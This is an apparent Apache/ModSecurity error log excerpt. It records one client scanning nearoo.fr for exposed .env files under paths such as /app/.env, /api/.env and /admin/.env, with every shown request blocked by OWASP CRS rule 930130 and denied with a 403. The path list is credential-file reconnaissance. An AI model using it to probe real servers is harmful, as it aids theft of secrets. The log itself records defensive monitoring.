[Mon May 11 17:35:51.389505 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agH3V_y_GXSWIKeli0sNSgAAAIE"]
[Mon May 11 17:35:51.828295 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agH3V_y_GXSWIKeli0sNTAAAAIE"]
[Mon May 11 17:35:51.828529 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agH3V_y_GXSWIKeli0sNTAAAAIE"]
[Mon May 11 17:35:51.828779 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agH3V_y_GXSWIKeli0sNTAAAAIE"]
[Mon May 11 17:35:52.059528 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agH3WPy_GXSWIKeli0sNTQAAAIE"]
[Mon May 11 17:35:52.059754 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agH3WPy_GXSWIKeli0sNTQAAAIE"]
[Mon May 11 17:35:52.060003 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agH3WPy_GXSWIKeli0sNTQAAAIE"]
[Mon May 11 17:35:52.364190 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agH3WPy_GXSWIKeli0sNTgAAAIE"]
[Mon May 11 17:35:52.364411 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agH3WPy_GXSWIKeli0sNTgAAAIE"]
[Mon May 11 17:35:52.364632 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agH3WPy_GXSWIKeli0sNTgAAAIE"]
[Mon May 11 17:35:52.465830 2026] [authz_core:error] [pid 1411055:tid 1411060] [client 176.120.22.46:53952] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/src/Core/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/src/Core/
[Mon May 11 17:35:52.687080 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agH3WPy_GXSWIKeli0sNTwAAAIE"]
[Mon May 11 17:35:52.687317 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agH3WPy_GXSWIKeli0sNTwAAAIE"]
[Mon May 11 17:35:52.687575 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agH3WPy_GXSWIKeli0sNTwAAAIE"]
[Mon May 11 17:35:52.868200 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agH3WPy_GXSWIKeli0sNVgAAAIE"]
[Mon May 11 17:35:52.868446 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agH3WPy_GXSWIKeli0sNVgAAAIE"]
[Mon May 11 17:35:52.868732 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agH3WPy_GXSWIKeli0sNVgAAAIE"]
[Mon May 11 17:35:53.257171 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWAAAAIE"]
[Mon May 11 17:35:53.257401 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWAAAAIE"]
[Mon May 11 17:35:53.257658 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWAAAAIE"]
[Mon May 11 17:35:53.524929 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWQAAAIE"]
[Mon May 11 17:35:53.525175 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWQAAAIE"]
[Mon May 11 17:35:53.525434 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWQAAAIE"]
[Mon May 11 17:35:53.725079 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWgAAAIE"]
[Mon May 11 17:35:53.725277 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWgAAAIE"]
[Mon May 11 17:35:53.725506 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agH3Wfy_GXSWIKeli0sNWgAAAIE"]
[Mon May 11 17:35:54.005019 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXgAAAIE"]
[Mon May 11 17:35:54.005288 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXgAAAIE"]
[Mon May 11 17:35:54.005590 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXgAAAIE"]
[Mon May 11 17:35:54.249725 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXwAAAIE"]
[Mon May 11 17:35:54.249959 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXwAAAIE"]
[Mon May 11 17:35:54.250213 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agH3Wvy_GXSWIKeli0sNXwAAAIE"]
[Mon May 11 17:35:56.307614 2026] [security2:error] [pid 1416109:tid 1416140] [client 49.233.45.47:43866] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agH3XFV4kyjgo4bQBUhuLwAAAMo"], referer: https://castiglionecf.com/
[Mon May 11 17:35:57.742873 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNYwAAAIE"]
[Mon May 11 17:35:57.743104 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNYwAAAIE"]
[Mon May 11 17:35:57.743375 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNYwAAAIE"]
[Mon May 11 17:35:57.942919 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNZAAAAIE"]
[Mon May 11 17:35:57.943131 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNZAAAAIE"]
[Mon May 11 17:35:57.943455 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agH3Xfy_GXSWIKeli0sNZAAAAIE"]
[Mon May 11 17:35:58.376249 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNZgAAAIE"]
